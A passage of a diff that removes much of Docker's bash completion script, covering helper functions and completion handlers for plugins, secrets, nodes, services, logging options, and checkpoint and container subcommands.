-# This function only deals with plugins that come bundled with Docker.
-# For completion of plugins managed by `docker plugin`, see
-# `__docker_complete_plugins_installed`.
-__docker_complete_plugins_bundled() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_plugins_bundled "$@")" -- "$current") )
-}
-
-# __docker_plugins_installed returns a list of all plugins that were installed with
-# the Docker plugin API.
-# By default, only names are returned.
-# Set DOCKER_COMPLETION_SHOW_PLUGIN_IDS=yes to also complete IDs.
-# For built-in pugins, see `__docker_plugins_bundled`.
-__docker_plugins_installed() {
-	local fields
-	if [ "$DOCKER_COMPLETION_SHOW_PLUGIN_IDS" = yes ] ; then
-		fields='$1,$2'
-	else
-		fields='$2'
-	fi
-	__docker_q plugin ls | awk "NR>1 {print $fields}"
-}
-
-# __docker_complete_plugins_installed applies completion of plugins that were installed
-# with the Docker plugin API, based on the current value of `$cur` or the value of
-# the optional first option `--cur`, if given.
-# For completion of built-in pugins, see `__docker_complete_plugins_bundled`.
-__docker_complete_plugins_installed() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_plugins_installed "$@")" -- "$current") )
-}
-
-__docker_runtimes() {
-	__docker_q info | sed -n 's/^Runtimes: \(.*\)/\1/p'
-}
-
-__docker_complete_runtimes() {
-	COMPREPLY=( $(compgen -W "$(__docker_runtimes)" -- "$cur") )
-}
-
-# __docker_secrets returns a list of all secrets.
-# By default, only names of secrets are returned.
-# Set DOCKER_COMPLETION_SHOW_SECRET_IDS=yes to also complete IDs of secrets.
-__docker_secrets() {
-	local fields='$2'  # default: name only
-	[ "${DOCKER_COMPLETION_SHOW_SECRET_IDS}" = yes ] && fields='$1,$2' # ID and name
-
-	__docker_q secret ls | awk "NR>1 {print $fields}"
-}
-
-# __docker_complete_secrets applies completion of secrets based on the current value
-# of `$cur`.
-__docker_complete_secrets() {
-	COMPREPLY=( $(compgen -W "$(__docker_secrets)" -- "$cur") )
-}
-
-# __docker_stacks returns a list of all stacks.
-__docker_stacks() {
-	__docker_q stack ls | awk 'NR>1 {print $1}'
-}
-
-# __docker_complete_stacks applies completion of stacks based on the current value
-# of `$cur` or the value of the optional first option `--cur`, if given.
-__docker_complete_stacks() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_stacks "$@")" -- "$current") )
-}
-
-# __docker_nodes returns a list of all nodes. Additional options to
-# `docker node ls` may be specified in order to filter the list, e.g.
-# `__docker_nodes --filter role=manager`
-# By default, only node names are returned.
-# Set DOCKER_COMPLETION_SHOW_NODE_IDS=yes to also complete node IDs.
-# An optional first option `--id|--name` may be used to limit the
-# output to the IDs or names of matching items. This setting takes
-# precedence over the environment setting.
-# Completions may be added with `--add`, e.g. `--add self`.
-__docker_nodes() {
-	local add=()
-	local fields='$2'  # default: node name only
-	[ "${DOCKER_COMPLETION_SHOW_NODE_IDS}" = yes ] && fields='$1,$2' # ID and name
-
-	while true ; do
-		case "$1" in
-			--id)
-				fields='$1' # IDs only
-				shift
-				;;
-			--name)
-				fields='$2' # names only
-				shift
-				;;
-			--add)
-				add+=("$2")
-				shift 2
-				;;
-			*)
-				break
-				;;
-		esac
-	done
-
-	echo $(__docker_q node ls "$@" | tr -d '*' | awk "NR>1 {print $fields}") "${add[@]}"
-}
-
-# __docker_complete_nodes applies completion of nodes based on the current
-# value of `$cur` or the value of the optional first option `--cur`, if given.
-# Additional filters may be appended, see `__docker_nodes`.
-__docker_complete_nodes() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_nodes "$@")" -- "$current") )
-}
-
-__docker_complete_nodes_plus_self() {
-	__docker_complete_nodes --add self "$@"
-}
-
-# __docker_services returns a list of all services. Additional options to
-# `docker service ls` may be specified in order to filter the list, e.g.
-# `__docker_services --filter name=xxx`
-# By default, only node names are returned.
-# Set DOCKER_COMPLETION_SHOW_SERVICE_IDS=yes to also complete IDs.
-# An optional first option `--id|--name` may be used to limit the
-# output to the IDs or names of matching items. This setting takes
-# precedence over the environment setting.
-__docker_services() {
-	local fields='$2'  # default: service name only
-	[ "${DOCKER_COMPLETION_SHOW_SERVICE_IDS}" = yes ] && fields='$1,$2' # ID & name
-
-	if [ "$1" = "--id" ] ; then
-		fields='$1' # IDs only
-		shift
-	elif [ "$1" = "--name" ] ; then
-		fields='$2' # names only
-		shift
-	fi
-        __docker_q service ls "$@" | awk "NR>1 {print $fields}"
-}
-
-# __docker_complete_services applies completion of services based on the current
-# value of `$cur` or the value of the optional first option `--cur`, if given.
-# Additional filters may be appended, see `__docker_services`.
-__docker_complete_services() {
-	local current="$cur"
-	if [ "$1" = "--cur" ] ; then
-		current="$2"
-		shift 2
-	fi
-	COMPREPLY=( $(compgen -W "$(__docker_services "$@")" -- "$current") )
-}
-
-# __docker_append_to_completions appends the word passed as an argument to every
-# word in `$COMPREPLY`.
-# Normally you do this with `compgen -S` while generating the completions.
-# This function allows you to append a suffix later. It allows you to use
-# the __docker_complete_XXX functions in cases where you need a suffix.
-__docker_append_to_completions() {
-	COMPREPLY=( ${COMPREPLY[@]/%/"$1"} )
-}
-
-# __docker_is_experimental tests whether the currently configured Docker daemon
-# runs in experimental mode. If so, the function exits with 0 (true).
-# Otherwise, or if the result cannot be determined, the exit value is 1 (false).
-__docker_is_experimental() {
-	[ "$(__docker_q version -f '{{.Server.Experimental}}')" = "true" ]
-}
-
-# __docker_pos_first_nonflag finds the position of the first word that is neither
-# option nor an option's argument. If there are options that require arguments,
-# you should pass a glob describing those options, e.g. "--option1|-o|--option2"
-# Use this function to restrict completions to exact positions after the argument list.
-__docker_pos_first_nonflag() {
-	local argument_flags=$1
-
-	local counter=$((${subcommand_pos:-${command_pos}} + 1))
-	while [ $counter -le $cword ]; do
-		if [ -n "$argument_flags" ] && eval "case '${words[$counter]}' in $argument_flags) true ;; *) false ;; esac"; then
-			(( counter++ ))
-			# eat "=" in case of --option=arg syntax
-			[ "${words[$counter]}" = "=" ] && (( counter++ ))
-		else
-			case "${words[$counter]}" in
-				-*)
-					;;
-				*)
-					break
-					;;
-			esac
-		fi
-
-		# Bash splits words at "=", retaining "=" as a word, examples:
-		# "--debug=false" => 3 words, "--log-opt syslog-facility=daemon" => 4 words
-		while [ "${words[$counter + 1]}" = "=" ] ; do
-			counter=$(( counter + 2))
-		done
-
-		(( counter++ ))
-	done
-
-	echo $counter
-}
-
-# __docker_map_key_of_current_option returns `key` if we are currently completing the
-# value of a map option (`key=value`) which matches the extglob given as an argument.
-# This function is needed for key-specific completions.
-__docker_map_key_of_current_option() {
-	local glob="$1"
-
-	local key glob_pos
-	if [ "$cur" = "=" ] ; then        # key= case
-		key="$prev"
-		glob_pos=$((cword - 2))
-	elif [[ $cur == *=* ]] ; then     # key=value case (OSX)
-		key=${cur%=*}
-		glob_pos=$((cword - 1))
-	elif [ "$prev" = "=" ] ; then
-		key=${words[$cword - 2]}  # key=value case
-		glob_pos=$((cword - 3))
-	else
-		return
-	fi
-
-	[ "${words[$glob_pos]}" = "=" ] && ((glob_pos--))  # --option=key=value syntax
-
-	[[ ${words[$glob_pos]} == @($glob) ]] && echo "$key"
-}
-
-# __docker_value_of_option returns the value of the first option matching `option_glob`.
-# Valid values for `option_glob` are option names like `--log-level` and globs like
-# `--log-level|-l`
-# Only positions between the command and the current word are considered.
-__docker_value_of_option() {
-	local option_extglob=$(__docker_to_extglob "$1")
-
-	local counter=$((command_pos + 1))
-	while [ $counter -lt $cword ]; do
-		case ${words[$counter]} in
-			$option_extglob )
-				echo ${words[$counter + 1]}
-				break
-				;;
-		esac
-		(( counter++ ))
-	done
-}
-
-# __docker_to_alternatives transforms a multiline list of strings into a single line
-# string with the words separated by `|`.
-# This is used to prepare arguments to __docker_pos_first_nonflag().
-__docker_to_alternatives() {
-	local parts=( $1 )
-	local IFS='|'
-	echo "${parts[*]}"
-}
-
-# __docker_to_extglob transforms a multiline list of options into an extglob pattern
-# suitable for use in case statements.
-__docker_to_extglob() {
-	local extglob=$( __docker_to_alternatives "$1" )
-	echo "@($extglob)"
-}
-
-# __docker_subcommands processes subcommands
-# Locates the first occurrence of any of the subcommands contained in the
-# first argument. In case of a match, calls the corresponding completion
-# function and returns 0.
-# If no match is found, 1 is returned. The calling function can then
-# continue processing its completion.
-#
-# TODO if the preceding command has options that accept arguments and an
-# argument is equal ot one of the subcommands, this is falsely detected as
-# a match.
-__docker_subcommands() {
-	local subcommands="$1"
-
-	local counter=$(($command_pos + 1))
-	while [ $counter -lt $cword ]; do
-		case "${words[$counter]}" in
-			$(__docker_to_extglob "$subcommands") )
-				subcommand_pos=$counter
-				local subcommand=${words[$counter]}
-				local completions_func=_docker_${command}_${subcommand}
-				declare -F $completions_func >/dev/null && $completions_func
-				return 0
-				;;
-		esac
-		(( counter++ ))
-	done
-	return 1
-}
-
-# __docker_nospace suppresses trailing whitespace
-__docker_nospace() {
-	# compopt is not available in ancient bash versions
-	type compopt &>/dev/null && compopt -o nospace
-}
-
-__docker_complete_resolved_hostname() {
-	command -v host >/dev/null 2>&1 || return
-	COMPREPLY=( $(host 2>/dev/null "${cur%:}" | awk '/has address/ {print $4}') )
-}
-
-__docker_local_interfaces() {
-	command -v ip >/dev/null 2>&1 || return
-	ip addr show scope global 2>/dev/null | sed -n 's| \+inet \([0-9.]\+\).* \([^ ]\+\)|\1 \2|p'
-}
-
-__docker_complete_local_interfaces() {
-	local additional_interface
-	if [ "$1" = "--add" ] ; then
-		additional_interface="$2"
-	fi
-
-	COMPREPLY=( $( compgen -W "$(__docker_local_interfaces) $additional_interface" -- "$cur" ) )
-}
-
-__docker_complete_capabilities() {
-	# The list of capabilities is defined in types.go, ALL was added manually.
-	COMPREPLY=( $( compgen -W "
-		ALL
-		AUDIT_CONTROL
-		AUDIT_WRITE
-		AUDIT_READ
-		BLOCK_SUSPEND
-		CHOWN
-		DAC_OVERRIDE
-		DAC_READ_SEARCH
-		FOWNER
-		FSETID
-		IPC_LOCK
-		IPC_OWNER
-		KILL
-		LEASE
-		LINUX_IMMUTABLE
-		MAC_ADMIN
-		MAC_OVERRIDE
-		MKNOD
-		NET_ADMIN
-		NET_BIND_SERVICE
-		NET_BROADCAST
-		NET_RAW
-		SETFCAP
-		SETGID
-		SETPCAP
-		SETUID
-		SYS_ADMIN
-		SYS_BOOT
-		SYS_CHROOT
-		SYSLOG
-		SYS_MODULE
-		SYS_NICE
-		SYS_PACCT
-		SYS_PTRACE
-		SYS_RAWIO
-		SYS_RESOURCE
-		SYS_TIME
-		SYS_TTY_CONFIG
-		WAKE_ALARM
-	" -- "$cur" ) )
-}
-
-__docker_complete_detach-keys() {
-	case "$prev" in
-		--detach-keys)
-			case "$cur" in
-				*,)
-					COMPREPLY=( $( compgen -W "${cur}ctrl-" -- "$cur" ) )
-					;;
-				*)
-					COMPREPLY=( $( compgen -W "ctrl-" -- "$cur" ) )
-					;;
-			esac
-
-			__docker_nospace
-			return
-			;;
-	esac
-	return 1
-}
-
-__docker_complete_isolation() {
-	COMPREPLY=( $( compgen -W "default hyperv process" -- "$cur" ) )
-}
-
-__docker_complete_log_drivers() {
-	COMPREPLY=( $( compgen -W "
-		awslogs
-		etwlogs
-		fluentd
-		gcplogs
-		gelf
-		journald
-		json-file
-		logentries
-		none
-		splunk
-		syslog
-	" -- "$cur" ) )
-}
-
-__docker_complete_log_options() {
-	# see docs/reference/logging/index.md
-	local awslogs_options="awslogs-region awslogs-group awslogs-stream"
-	local fluentd_options="env fluentd-address fluentd-async-connect fluentd-buffer-limit fluentd-retry-wait fluentd-max-retries labels tag"
-	local gcplogs_options="env gcp-log-cmd gcp-project labels"
-	local gelf_options="env gelf-address gelf-compression-level gelf-compression-type labels tag"
-	local journald_options="env labels tag"
-	local json_file_options="env labels max-file max-size"
-	local logentries_options="logentries-token"
-	local syslog_options="env labels syslog-address syslog-facility syslog-format syslog-tls-ca-cert syslog-tls-cert syslog-tls-key syslog-tls-skip-verify tag"
-	local splunk_options="env labels splunk-caname splunk-capath splunk-format splunk-gzip splunk-gzip-level splunk-index splunk-insecureskipverify splunk-source splunk-sourcetype splunk-token splunk-url splunk-verify-connection tag"
-
-	local all_options="$fluentd_options $gcplogs_options $gelf_options $journald_options $logentries_options $json_file_options $syslog_options $splunk_options"
-
-	case $(__docker_value_of_option --log-driver) in
-		'')
-			COMPREPLY=( $( compgen -W "$all_options" -S = -- "$cur" ) )
-			;;
-		awslogs)
-			COMPREPLY=( $( compgen -W "$awslogs_options" -S = -- "$cur" ) )
-			;;
-		fluentd)
-			COMPREPLY=( $( compgen -W "$fluentd_options" -S = -- "$cur" ) )
-			;;
-		gcplogs)
-			COMPREPLY=( $( compgen -W "$gcplogs_options" -S = -- "$cur" ) )
-			;;
-		gelf)
-			COMPREPLY=( $( compgen -W "$gelf_options" -S = -- "$cur" ) )
-			;;
-		journald)
-			COMPREPLY=( $( compgen -W "$journald_options" -S = -- "$cur" ) )
-			;;
-		json-file)
-			COMPREPLY=( $( compgen -W "$json_file_options" -S = -- "$cur" ) )
-			;;
-		logentries)
-			COMPREPLY=( $( compgen -W "$logentries_options" -S = -- "$cur" ) )
-			;;
-		syslog)
-			COMPREPLY=( $( compgen -W "$syslog_options" -S = -- "$cur" ) )
-			;;
-		splunk)
-			COMPREPLY=( $( compgen -W "$splunk_options" -S = -- "$cur" ) )
-			;;
-		*)
-			return
-			;;
-	esac
-
-	__docker_nospace
-}
-
-__docker_complete_log_driver_options() {
-	local key=$(__docker_map_key_of_current_option '--log-opt')
-	case "$key" in
-		fluentd-async-connect)
-			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
-			return
-			;;
-		gelf-address)
-			COMPREPLY=( $( compgen -W "udp" -S "://" -- "${cur##*=}" ) )
-			__docker_nospace
-			return
-			;;
-		gelf-compression-level)
-			COMPREPLY=( $( compgen -W "1 2 3 4 5 6 7 8 9" -- "${cur##*=}" ) )
-			return
-			;;
-		gelf-compression-type)
-			COMPREPLY=( $( compgen -W "gzip none zlib" -- "${cur##*=}" ) )
-			return
-			;;
-		syslog-address)
-			COMPREPLY=( $( compgen -W "tcp:// tcp+tls:// udp:// unix://" -- "${cur##*=}" ) )
-			__docker_nospace
-			__ltrim_colon_completions "${cur}"
-			return
-			;;
-		syslog-facility)
-			COMPREPLY=( $( compgen -W "
-				auth
-				authpriv
-				cron
-				daemon
-				ftp
-				kern
-				local0
-				local1
-				local2
-				local3
-				local4
-				local5
-				local6
-				local7
-				lpr
-				mail
-				news
-				syslog
-				user
-				uucp
-			" -- "${cur##*=}" ) )
-			return
-			;;
-		syslog-format)
-			COMPREPLY=( $( compgen -W "rfc3164 rfc5424 rfc5424micro" -- "${cur##*=}" ) )
-			return
-			;;
-		syslog-tls-ca-cert|syslog-tls-cert|syslog-tls-key)
-			_filedir
-			return
-			;;
-		syslog-tls-skip-verify)
-			COMPREPLY=( $( compgen -W "true" -- "${cur##*=}" ) )
-			return
-			;;
-		splunk-url)
-			COMPREPLY=( $( compgen -W "http:// https://" -- "${cur##*=}" ) )
-			__docker_nospace
-			__ltrim_colon_completions "${cur}"
-			return
-			;;
-		splunk-gzip|splunk-insecureskipverify|splunk-verify-connection)
-			COMPREPLY=( $( compgen -W "false true" -- "${cur##*=}" ) )
-			return
-			;;
-		splunk-format)
-			COMPREPLY=( $( compgen -W "inline json raw" -- "${cur##*=}" ) )
-			return
-			;;
-	esac
-	return 1
-}
-
-__docker_complete_log_levels() {
-	COMPREPLY=( $( compgen -W "debug info warn error fatal" -- "$cur" ) )
-}
-
-__docker_complete_restart() {
-	case "$prev" in
-		--restart)
-			case "$cur" in
-				on-failure:*)
-					;;
-				*)
-					COMPREPLY=( $( compgen -W "always no on-failure on-failure: unless-stopped" -- "$cur") )
-					;;
-			esac
-			return
-			;;
-	esac
-	return 1
-}
-
-# __docker_complete_signals returns a subset of the available signals that is most likely
-# relevant in the context of docker containers
-__docker_complete_signals() {
-	local signals=(
-		SIGCONT
-		SIGHUP
-		SIGINT
-		SIGKILL
-		SIGQUIT
-		SIGSTOP
-		SIGTERM
-		SIGUSR1
-		SIGUSR2
-	)
-	COMPREPLY=( $( compgen -W "${signals[*]} ${signals[*]#SIG}" -- "$( echo $cur | tr '[:lower:]' '[:upper:]')" ) )
-}
-
-__docker_complete_user_group() {
-	if [[ $cur == *:* ]] ; then
-		COMPREPLY=( $(compgen -g -- "${cur#*:}") )
-	else
-		COMPREPLY=( $(compgen -u -S : -- "$cur") )
-		__docker_nospace
-	fi
-}
-
-_docker_docker() {
-	# global options that may appear after the docker command
-	local boolean_options="
-		$global_boolean_options
-		--help
-		--version -v
-	"
-
-	case "$prev" in
-		--config)
-			_filedir -d
-			return
-			;;
-		--log-level|-l)
-			__docker_complete_log_levels
-			return
-			;;
-		$(__docker_to_extglob "$global_options_with_args") )
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "$boolean_options $global_options_with_args" -- "$cur" ) )
-			;;
-		*)
-			local counter=$( __docker_pos_first_nonflag "$(__docker_to_extglob "$global_options_with_args")" )
-			if [ $cword -eq $counter ]; then
-				__docker_is_experimental && commands+=(${experimental_commands[*]})
-				COMPREPLY=( $( compgen -W "${commands[*]} help" -- "$cur" ) )
-			fi
-			;;
-	esac
-}
-
-_docker_attach() {
-	_docker_container_attach
-}
-
-_docker_build() {
-	_docker_image_build
-}
-
-
-_docker_checkpoint() {
-	local subcommands="
-		create
-		ls
-		rm
-	"
-	local aliases="
-		list
-		remove
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_checkpoint_create() {
-	case "$prev" in
-		--checkpoint-dir)
-			_filedir -d
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--checkpoint-dir --help --leave-running" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--checkpoint-dir')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_running
-			fi
-			;;
-	esac
-}
-
-_docker_checkpoint_ls() {
-	case "$prev" in
-		--checkpoint-dir)
-			_filedir -d
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--checkpoint-dir')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_checkpoint_rm() {
-	case "$prev" in
-		--checkpoint-dir)
-			_filedir -d
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--checkpoint-dir --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--checkpoint-dir')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			elif [ $cword -eq $(($counter + 1)) ]; then
-				COMPREPLY=( $( compgen -W "$(__docker_q checkpoint ls "$prev" | sed 1d)" -- "$cur" ) )
-			fi
-			;;
-	esac
-}
-
-
-_docker_container() {
-	local subcommands="
-		attach
-		commit
-		cp
-		create
-		diff
-		exec
-		export
-		inspect
-		kill
-		logs
-		ls
-		pause
-		port
-		prune
-		rename
-		restart
-		rm
-		run
-		start
-		stats
-		stop
-		top
-		unpause
-		update
-		wait
-	"
-	local aliases="
-		list
-		ps
-	"
-	__docker_subcommands "$subcommands $aliases" && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			COMPREPLY=( $( compgen -W "$subcommands" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_container_attach() {
-	__docker_complete_detach-keys && return
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--detach-keys --help --no-stdin --sig-proxy=false" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--detach-keys')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_running
-			fi
-			;;
-	esac
-}
-
-_docker_container_commit() {
-	case "$prev" in
-		--author|-a|--change|-c|--message|-m)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--author -a --change -c --help --message -m --pause=false -p=false" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--author|-a|--change|-c|--message|-m')
-
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-				return
-			fi
-			(( counter++ ))
-
-			if [ $cword -eq $counter ]; then
-				__docker_complete_image_repos_and_tags
-				return
-			fi
-			;;
-	esac
-}
-
-_docker_container_cp() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--follow-link -L --help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				case "$cur" in
-					*:)
-						return
-						;;
-					*)
-						# combined container and filename completion
-						_filedir
-						local files=( ${COMPREPLY[@]} )
-
-						__docker_complete_containers_all
-						COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
-						local containers=( ${COMPREPLY[@]} )
-
-						COMPREPLY=( $( compgen -W "${files[*]} ${containers[*]}" -- "$cur" ) )
-						if [[ "$COMPREPLY" == *: ]]; then
-							__docker_nospace
-						fi
-						return
-						;;
-				esac
-			fi
-			(( counter++ ))
-
-			if [ $cword -eq $counter ]; then
-				if [ -e "$prev" ]; then
-					__docker_complete_containers_all
-					COMPREPLY=( $( compgen -W "${COMPREPLY[*]}" -S ':' ) )
-					__docker_nospace
-				else
-					_filedir
-				fi
-				return
-			fi
-			;;
-	esac
-}
-
-_docker_container_create() {
-	_docker_container_run
-}
-
-_docker_container_diff() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_container_exec() {
-	__docker_complete_detach-keys && return
-
-	case "$prev" in
-		--env|-e)
-			# we do not append a "=" here because "-e VARNAME" is legal systax, too
-			COMPREPLY=( $( compgen -e -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--user|-u)
-			__docker_complete_user_group
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--detach -d --detach-keys --env -e --help --interactive -i --privileged -t --tty -u --user" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_running
-			;;
-	esac
-}
-
-_docker_container_export() {
-	case "$prev" in
-		--output|-o)
-			_filedir
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --output -o" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_container_inspect() {
-	_docker_inspect --type container
-}
-
-_docker_container_kill() {
-	case "$prev" in
-		--signal|-s)
-			__docker_complete_signals
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --signal -s" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_running
-			;;
-	esac
-}
-
-_docker_container_logs() {
-	case "$prev" in
-		--since|--tail)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--details --follow -f --help --since --tail --timestamps -t" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag '--since|--tail')
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_container_list() {
-	_docker_container_ls
-}
-
-_docker_container_ls() {
-	local key=$(__docker_map_key_of_current_option '--filter|-f')
-	case "$key" in
-		ancestor)
-			cur="${cur##*=}"
-			__docker_complete_images
-			return
-			;;
-		before)
-			__docker_complete_containers_all --cur "${cur##*=}"
-			return
-			;;
-		id)
-			__docker_complete_containers_all --cur "${cur##*=}" --id
-			return
-			;;
-		health)
-			COMPREPLY=( $( compgen -W "healthy starting none unhealthy" -- "${cur##*=}" ) )
-			return
-			;;
-		is-task)
-			COMPREPLY=( $( compgen -W "true false" -- "${cur##*=}" ) )
-			return
-			;;
-		name)
-			__docker_complete_containers_all --cur "${cur##*=}" --name
-			return
-			;;
-		network)
-			__docker_complete_networks --cur "${cur##*=}"
-			return
-			;;
-		since)
-			__docker_complete_containers_all --cur "${cur##*=}"
-			return
-			;;
-		status)
-			COMPREPLY=( $( compgen -W "created dead exited paused restarting running removing" -- "${cur##*=}" ) )
-			return
-			;;
-		volume)
-			__docker_complete_volumes --cur "${cur##*=}"
-			return
-			;;
-	esac
-
-	case "$prev" in
-		--filter|-f)
-			COMPREPLY=( $( compgen -S = -W "ancestor before exited health id is-task label name network since status volume" -- "$cur" ) )
-			__docker_nospace
-			return
-			;;
-		--format|--last|-n)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--all -a --filter -f --format --help --last -n --latest -l --no-trunc --quiet -q --size -s" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_container_pause() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_running
-			;;
-	esac
-}
-
-_docker_container_port() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_container_prune() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help" -- "$cur" ) )
-			;;
-	esac
-}
-
-_docker_container_ps() {
-	_docker_container_ls
-}
-
-_docker_container_rename() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help" -- "$cur" ) )
-			;;
-		*)
-			local counter=$(__docker_pos_first_nonflag)
-			if [ $cword -eq $counter ]; then
-				__docker_complete_containers_all
-			fi
-			;;
-	esac
-}
-
-_docker_container_restart() {
-	case "$prev" in
-		--time|-t)
-			return
-			;;
-	esac
-
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--help --time -t" -- "$cur" ) )
-			;;
-		*)
-			__docker_complete_containers_all
-			;;
-	esac
-}
-
-_docker_container_rm() {
-	case "$cur" in
-		-*)
-			COMPREPLY=( $( compgen -W "--force -f --help --link -l --volumes -v" -- "$cur" ) )
-			;;
-		*)
-			for arg in "${COMP_WORDS[@]}"; do
-				case "$arg" in
-					--force|-f)
-						__docker_complete_containers_all
-						return
-						;;
-				esac
-			done
-			__docker_complete_containers_stopped
-			;;
-	esac
-}
-
-_docker_container_run() {
-	local options_with_args="
-		--add-host
-		--attach -a
-		--blkio-weight
-		--blkio-weight-device
-		--cap-add
-		--cap-drop
-		--cgroup-parent
-		--cidfile
-		--cpu-period
-		--cpu-quota
-		--cpu-rt-period
-		--cpu-rt-runtime
-		--cpuset-cpus
-		--cpus
-		--cpuset-mems
-		--cpu-shares -c
-		--device
-		--device-read-bps
-		--device-read-iops
-		--device-write-bps
-		--device-write-iops
-		--dns
-		--dns-option
-		--dns-search
-		--entrypoint
-		--env -e
-		--env-file
-		--expose
-		--group-add
-		--hostname -h
-		--init-path
-		--ip
-		--ip6
-		--ipc
-		--isolation
-		--kernel-memory
-		--label-file
-		--label -l
-		--link
-		--link-local-ip
-		--log-driver
-		--log-opt
-		--mac-address
-		--memory -m
-		--memory-swap
-		--memory-swappiness
-		--memory-reservation
-		--name
-		--network
-		--network-alias
-		--oom-score-adj
-		--pid
-		--pids-limit
-		--publish -p
-		--restart
-		--runtime
-		--security-opt
-		--shm-size
-		--stop-signal
-		--stop-timeout
-		--storage-opt
-		--tmpfs
-		--sysctl
-		--ulimit
-		--user -u
-		--userns
-		--uts
-		--volume-driver
-		--volumes-from
-		--volume -v
-		--workdir -w
-	"
-
-	local boolean_options="
-		--disable-content-trust=false
-		--help
-		--init
-		--interactive -i
-		--oom-kill-disable
-		--privileged
-		--publish-all -P
-		--read-only
-		--tty -t
-	"
-
-	if [ "$command" = "run" -o "$subcommand" = "run" ] ; then
-		options_with_args="$options_with_args
-			--detach-keys
-			--health-cmd
-			--health-interval
-			--health-retries
-			--health-timeout
-		"
-		boolean_options="$boolean_options
-			--detach -d
-			--no-healthcheck
-			--rm
-			--sig-proxy=false
-		"
-		__docker_complete_detach-keys && return
-	fi
-
-	local all_options="$options_with_args $boolean_options"
-
-
-	__docker_complete_log_driver_options && return
-	__docker_complete_restart && return
-
-	local key=$(__docker_map_key_of_current_option '--security-opt')
-	case "$key" in
-		label)
-			[[ $cur == *: ]] && return
-			COMPREPLY=( $( compgen -W "user: role: type: level: disable" -- "${cur##*=}") )
-			if [ "${COMPREPLY[*]}" != "disable" ] ; then
-				__docker_nospace
-			fi
-			return
-			;;
-		seccomp)
-			local cur=${cur##*=}
-			_filedir
-			COMPREPLY+=( $( compgen -W "unconfined" -- "$cur" ) )
-			return
-			;;
